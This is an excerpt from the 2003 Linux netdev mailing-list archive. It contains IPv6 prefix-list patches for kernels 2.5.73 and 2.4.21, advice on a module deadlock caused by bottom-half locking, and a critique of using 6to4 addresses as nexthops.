2003-07-14 10:30:59.000000000 -0700 @@ -44,4 +44,16 @@ #define RTMSG_NEWROUTE 0x21 #define RTMSG_DELROUTE 0x22 +/* + * Return entire prefix list in array of following structures. 
Provides the + * prefix and prefix length for all devices. + */ + +struct in6_prefix_msg +{ + int ifindex; + int prefix_len; + struct in6_addr prefix; +}; + #endif diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h PATCHES/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ PATCHES/linux-2.5.73/include/linux/rtnetlink.h 2003-07-14 12:11:51.000000000 -0700 @@ -47,7 +47,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETPLIST (RTM_BASE+34) + +#define RTM_MAX (RTM_GETPLIST+1) /* Generic structure for encapsulation of optional route information. @@ -201,9 +203,10 @@ RTA_FLOW, RTA_CACHEINFO, RTA_SESSION, + RTA_RA6INFO, /* No support yet, send event on new prefix event */ }; -#define RTA_MAX RTA_SESSION +#define RTA_MAX RTA_RA6INFO #define RTM_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct rtmsg)))) #define RTM_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct rtmsg)) diff -ruN linux-2.5.73.org/include/net/ip6_route.h PATCHES/linux-2.5.73/include/net/ip6_route.h --- linux-2.5.73.org/include/net/ip6_route.h 2003-06-22 11:32:37.000000000 -0700 +++ PATCHES/linux-2.5.73/include/net/ip6_route.h 2003-07-14 10:30:59.000000000 -0700 @@ -87,6 +87,7 @@ struct nlmsghdr; struct netlink_callback; extern int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb); +extern int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb); extern int inet6_rtm_newroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_delroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_getroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c PATCHES/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/addrconf.c 2003-07-14 
12:22:07.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1378,7 +1378,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF); } if (ifp && valid_lft == 0) { @@ -1529,7 +1529,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1704,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1943,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ 
-1958,7 +1957,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1967,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2459,6 +2458,7 @@ [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, .dumpit = inet6_dump_fib, }, + [RTM_GETPLIST - RTM_BASE] = { .dumpit = inet6_dump_prefix, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.5.73.org/net/ipv6/route.c PATCHES/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/route.c 2003-07-14 10:30:59.000000000 -0700 @@ -1511,6 +1511,66 @@ return 0; } +static int rt6_fill_prefix(struct sk_buff *skb, struct rt6_info *rt, + int type, u32 pid, u32 seq) +{ + struct in6_prefix_msg *pmsg; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*pmsg)); + pmsg = NLMSG_DATA(nlh); + pmsg->ifindex = rt->rt6i_dev->ifindex; + pmsg->prefix_len = rt->rt6i_dst.plen; + ipv6_addr_copy(&pmsg->prefix, &rt->rt6i_dst.addr); + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "rt6_fill_prefix:skb size not enough\n"); + skb_trim(skb, b - skb->data); + return -1; +} + +static int rt6_dump_route_prefix(struct rt6_info *rt, void *p_arg) +{ + int addr_type; + struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + + /* + * Definition of a prefix : + * - Should be autoconfigured + * - No 
nexthop + * - Not a linklocal, loopback or multicast type. + */ + if (rt->rt6i_nexthop || (rt->rt6i_flags & RTF_ADDRCONF) == 0) + return 0; + addr_type = ipv6_addr_type(&rt->rt6i_dst.addr); + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | + IPV6_ADDR_MULTICAST)) != 0 || + addr_type == IPV6_ADDR_ANY) + return 0; + return rt6_fill_prefix(arg->skb, rt, RTM_GETPLIST, + NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq); +} + +static int fib6_dump_prefix(struct fib6_walker_t *w) +{ + int res; + struct rt6_info *rt; + + for (rt = w->leaf; rt; rt = rt->u.next) { + res = rt6_dump_route_prefix(rt, w->args); + if (res < 0) { + /* Frame is full, suspend walking */ + w->leaf = rt; + return 1; + } + } + w->leaf = NULL; + return 0; +} + static void fib6_dump_end(struct netlink_callback *cb) { struct fib6_walker_t *w = (void*)cb->args[0]; @@ -1532,7 +1592,8 @@ return cb->done(cb); } -int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +static int __inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb, + int prefix) { struct rt6_rtnl_dump_arg arg; struct fib6_walker_t *w; @@ -1559,7 +1620,10 @@ RT6_TRACE("dump<%p", w); memset(w, 0, sizeof(*w)); w->root = &ip6_routing_table; - w->func = fib6_dump_node; + if (prefix) + w->func = fib6_dump_prefix; + else + w->func = fib6_dump_node; w->args = &arg; cb->args[0] = (long)w; read_lock_bh(&rt6_lock); @@ -1586,6 +1650,16 @@ return res; } +int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 0); +} + +int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 1); +} + int inet6_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr* nlh, void *arg) { struct rtattr **rta = arg; ------------------------------------------------------------------------------ From krkumar@us.ibm.com Mon Jul 14 15:45:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:45:22 -0700 (PDT) Received: 
from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMjGFl014722 for ; Mon, 14 Jul 2003 15:45:17 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMiSpW183284; Mon, 14 Jul 2003 18:44:28 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMiQgo243202; Mon, 14 Jul 2003 18:44:27 -0400 Date: Mon, 14 Jul 2003 15:43:01 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 4/4] Prefix List against 2.4.21 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4025 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev ------------------ Prefix List against 2.4.21 --------------------------- diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h PATCHES/linux-2.4.21/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ PATCHES/linux-2.4.21/include/linux/ipv6_route.h 2003-07-14 10:30:53.000000000 -0700 @@ -53,4 +53,16 @@ #define RTMSG_NEWROUTE 0x21 #define RTMSG_DELROUTE 0x22 +/* + * Return entire prefix list in array of following structures. Provides the + * prefix and prefix length for all devices. 
+ */ + +struct in6_prefix_msg +{ + int ifindex; + int prefix_len; + struct in6_addr prefix; +}; + #endif diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h PATCHES/linux-2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ PATCHES/linux-2.4.21/include/linux/rtnetlink.h 2003-07-14 12:32:49.000000000 -0700 @@ -46,7 +46,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETPLIST (RTM_BASE+34) + +#define RTM_MAX (RTM_GETPLIST+1) /* Generic structure for encapsulation optional route information. @@ -198,10 +200,11 @@ RTA_MULTIPATH, RTA_PROTOINFO, RTA_FLOW, - RTA_CACHEINFO + RTA_CACHEINFO, + RTA_RA6INFO, /* No support yet, send event on new prefix event */ }; -#define RTA_MAX RTA_CACHEINFO +#define RTA_MAX RTA_RA6INFO #define RTM_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct rtmsg)))) #define RTM_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct rtmsg)) diff -ruN linux-2.4.21.org/include/net/ip6_route.h PATCHES/linux-2.4.21/include/net/ip6_route.h --- linux-2.4.21.org/include/net/ip6_route.h 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/include/net/ip6_route.h 2003-07-14 12:49:45.000000000 -0700 @@ -84,6 +84,7 @@ struct nlmsghdr; struct netlink_callback; extern int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb); +extern int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb); extern int inet6_rtm_newroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_delroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_getroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c PATCHES/linux-2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/addrconf.c 2003-07-14 12:21:50.000000000 -0700 @@ 
-101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1054,7 +1054,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF); } if (ifp && valid_lft == 0) { @@ -1166,7 +1166,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1341,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1578,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1592,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1602,7 @@ 
addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -1987,6 +1986,36 @@ { inet6_rtm_delroute, NULL, }, { inet6_rtm_getroute, inet6_dump_fib, }, { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, inet6_dump_prefix }, + { NULL, NULL, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.4.21.org/net/ipv6/route.c PATCHES/linux-2.4.21/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/route.c 2003-07-14 10:30:53.000000000 -0700 @@ -1627,6 +1627,66 @@ return 0; } +static int rt6_fill_prefix(struct sk_buff *skb, struct rt6_info *rt, + int type, u32 pid, u32 seq) +{ + struct in6_prefix_msg *pmsg; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*pmsg)); + pmsg = NLMSG_DATA(nlh); + pmsg->ifindex = rt->rt6i_dev->ifindex; + pmsg->prefix_len = rt->rt6i_dst.plen; + ipv6_addr_copy(&pmsg->prefix, &rt->rt6i_dst.addr); + nlh->nlmsg_len = skb->tail - b; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "rt6_fill_prefix:skb size not enough\n"); + skb_trim(skb, b - skb->data); + return -1; +} + +static int rt6_dump_route_prefix(struct rt6_info *rt, void *p_arg) +{ + int addr_type; + struct rt6_rtnl_dump_arg *arg = (struct 
rt6_rtnl_dump_arg *) p_arg; + + /* + * Definition of a prefix : + * - Should be autoconfigured + * - No nexthop + * - Not a linklocal, loopback or multicast type. + */ + if (rt->rt6i_nexthop || (rt->rt6i_flags & RTF_ADDRCONF) == 0) + return 0; + addr_type = ipv6_addr_type(&rt->rt6i_dst.addr); + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | + IPV6_ADDR_MULTICAST)) != 0 || + addr_type == IPV6_ADDR_ANY) + return 0; + return rt6_fill_prefix(arg->skb, rt, RTM_GETPLIST, + NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq); +} + +static int fib6_dump_prefix(struct fib6_walker_t *w) +{ + int res; + struct rt6_info *rt; + + for (rt = w->leaf; rt; rt = rt->u.next) { + res = rt6_dump_route_prefix(rt, w->args); + if (res < 0) { + /* Frame is full, suspend walking */ + w->leaf = rt; + return 1; + } + } + w->leaf = NULL; + return 0; +} + static void fib6_dump_end(struct netlink_callback *cb) { struct fib6_walker_t *w = (void*)cb->args[0]; @@ -1648,7 +1708,8 @@ return cb->done(cb); } -int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +static int __inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb, + int prefix) { struct rt6_rtnl_dump_arg arg; struct fib6_walker_t *w; @@ -1675,7 +1736,10 @@ RT6_TRACE("dump<%p", w); memset(w, 0, sizeof(*w)); w->root = &ip6_routing_table; - w->func = fib6_dump_node; + if (prefix) + w->func = fib6_dump_prefix; + else + w->func = fib6_dump_node; w->args = &arg; cb->args[0] = (long)w; read_lock_bh(&rt6_lock); @@ -1702,6 +1766,16 @@ return res; } +int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 0); +} + +int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb) +{ + return __inet6_dump_fib(skb, cb, 1); +} + int inet6_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr* nlh, void *arg) { struct rtattr **rta = arg; ----------------------------------------------------------------------------- From shemminger@osdl.org Mon Jul 14 
15:49:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:49:58 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMnsFl015077 for ; Mon, 14 Jul 2003 15:49:54 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6EMnkI16850; Mon, 14 Jul 2003 15:49:46 -0700 Date: Mon, 14 Jul 2003 15:49:46 -0700 From: Stephen Hemminger To: N N Ashok Cc: netdev@oss.sgi.com Subject: Re: Kernel locking up in module Message-Id: <20030714154946.27369852.shemminger@osdl.org> In-Reply-To: <200307141746.30761.nalkunda@egr.msu.edu> References: <200307141746.30761.nalkunda@egr.msu.edu> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4026 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 17:46:30 -0400 N N Ashok wrote: > Hi All, > I am creating a module to measure the outgoing bandwidth usage on the > interfaces. It uses the get_stats() of the device to get the current stats > and then computes the bandwidth usage. The algorithm for the usage > calculation are borrowed from iproute2 package (tc/tc_estimator.c). > The problem is that the kernel keeps locking up. I am using rwlock_t locks > to lock the data. In the code, I traverse the list of bwuage structures and > as a debug message am printing whether the traversal ended in the variable > becoming null (which it should if everything went right), but the variable is > non-null every other time I insert the module. 
> printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? "non-null" : > "null", bwusage ? "non-null" : "null"); > > I think this has got to do with some locking issues. As this is my first go > at the kernel locking, I might have used the wrong kind of locks. I have > attached the module source, header and the log messages as I inserted the > module a couple of times. I request you all to please help me as I am totally > lost here. > > Thanks, > Ashok You are not locking out the bottom half receive thread so it will deadlock when it runs while your code holds the top half lock. From kuznet@ms2.inr.ac.ru Mon Jul 14 16:29:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 16:29:34 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ENTLFl015900 for ; Mon, 14 Jul 2003 16:29:24 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA06071; Tue, 15 Jul 2003 03:29:12 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307142329.DAA06071@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: davem@redhat.com (David S. Miller) Date: Tue, 15 Jul 2003 03:29:12 +0400 (MSD) Cc: jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <20030713005345.1fea1092.davem@redhat.com> from "David S. Miller" at éÀÌ 13, 2003 12:53:45 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4027 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Hey guys, even though yoshfuji is away I don't see any > reason why I shouldn't apply the patch below to both > 2.4.x and 2.5.x. It looks very uncontroversial to me. > > Any objections? I would wait for experts. 
Technically, IPv6 does not allow the use of a non-link-local address as a nexthop address, because the nexthop address is expected to be unique for the router. The use of the IPv4-COMPAT format for tunnels was a hack to make tunnels handier to use: it is just a tricky way to encapsulate an IPv4 address inside an IPv6 one. It has nothing to do with _real_ IPv4-COMPAT addresses (though logically IPv4-COMPAT addresses _are_ really link-local for a 6over4 "network"); it is just an element of our API. Using a 6to4 address is a very strange idea in this context. It does not contradict anything, of course, but it looks utterly stupid: 6to4 is a complicated format, where information about the nexthop is encoded in an inappropriate way. Expect questions of the sort: "What the hell? I add a route with nexthop 2002:x:y::a:b and a:b disappears somewhere." And the question is right, because plain logic requires using a:b as the meaningful part of the nexthop: it is the part which provides node _identity_, while x:y is just routing information identifying a particular "6to4" network, and it is meaningless when used as a nexthop address. In short, this is a mess. Technically, it is just one more trick, and a useless one; logically... a mess. 
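To make the 2002:x:y::a:b layout concrete, here is a minimal user-space sketch (not kernel code, and not taken from the patch under discussion) of how the x:y part of a 6to4 address maps to an IPv4 address, assuming the standard 2002:V4ADDR::/48 layout. The function name sixto4_embedded_v4 is made up for illustration.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>

/*
 * Extract the IPv4 address embedded in a 6to4 address (2002:V4ADDR::/48).
 * Returns 1 and fills *v4 (network byte order) on success; returns 0 if
 * addr is not a valid IPv6 address or does not start with 2002::/16.
 * Hypothetical helper, for illustration only.
 */
int sixto4_embedded_v4(const char *addr, struct in_addr *v4)
{
	struct in6_addr a6;

	if (inet_pton(AF_INET6, addr, &a6) != 1)
		return 0;
	/* The 6to4 prefix is the fixed 16 bits 0x2002. */
	if (a6.s6_addr[0] != 0x20 || a6.s6_addr[1] != 0x02)
		return 0;
	/* Bytes 2..5 carry the IPv4 address, already in network order. */
	memcpy(&v4->s_addr, &a6.s6_addr[2], 4);
	return 1;
}
```

With this sketch, 2002:c000:204::a:b yields 192.0.2.4: only the x:y part (c000:204) is used, and the a:b part plays no role at all, which is the mismatch complained about above.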
Alexey From nalkunda@egr.msu.edu Mon Jul 14 16:42:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 16:42:46 -0700 (PDT) Received: from sys14.mail.msu.edu (sys14.mail.msu.edu [35.9.75.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ENgdFl016391 for ; Mon, 14 Jul 2003 16:42:39 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys14.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19cCxl-000O6G-00; Mon, 14 Jul 2003 19:42:33 -0400 Content-Type: text/plain; charset="iso-8859-1" From: N N Ashok Organization: CSE, Michigan State University To: Stephen Hemminger Subject: Re: Kernel locking up in module Date: Mon, 14 Jul 2003 19:35:18 -0400 User-Agent: KMail/1.4.3 Cc: netdev@oss.sgi.com References: <200307141746.30761.nalkunda@egr.msu.edu> <20030714154946.27369852.shemminger@osdl.org> In-Reply-To: <20030714154946.27369852.shemminger@osdl.org> MIME-Version: 1.0 Message-Id: <200307141935.18837.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6ENgdFl016391 X-archive-position: 4028 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev On Monday 14 July 2003 18:49, Stephen Hemminger scrawled: > On Mon, 14 Jul 2003 17:46:30 -0400 > > N N Ashok wrote: > > Hi All, > > I am creating a module to measure the outgoing bandwidth usage on the > > interfaces. It uses the get_stats() of the device to get the current > > stats and then computes the bandwidth usage. The algorithm for the usage > > calculation are borrowed from iproute2 package (tc/tc_estimator.c). The > > problem is that the kernel keeps locking up. I am using rwlock_t locks to > > lock the data. 
In the code, I traverse the list of bwuage structures and > > as a debug message am printing whether the traversal ended in the > > variable becoming null (which it should if everything went right), but > > the variable is non-null every other time I insert the module. > > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? > > "non-null" : "null", bwusage ? "non-null" : "null"); > > > > I think this has got to do with some locking issues. As this is my > > first go at the kernel locking, I might have used the wrong kind of > > locks. I have attached the module source, header and the log messages as > > I inserted the module a couple of times. I request you all to please help > > me as I am totally lost here. > > > > Thanks, > > Ashok > > You are not locking out the bottom half receive thread so it will deadlock > when it runs while your code holds the top half lock. Hi Stephen, Thanks for the reply. Do I used write_lock_bh()/write_unlock_bh() for my lock (bwusage_head_lock) while still using read_lock() for dev_base_lock ? Thanks, Ashok From kuznet@ms2.inr.ac.ru Mon Jul 14 16:49:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 16:49:55 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ENnpFl016782 for ; Mon, 14 Jul 2003 16:49:52 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA06134; Tue, 15 Jul 2003 03:49:43 +0400 From: kuznet@ms2.inr.ac.ru 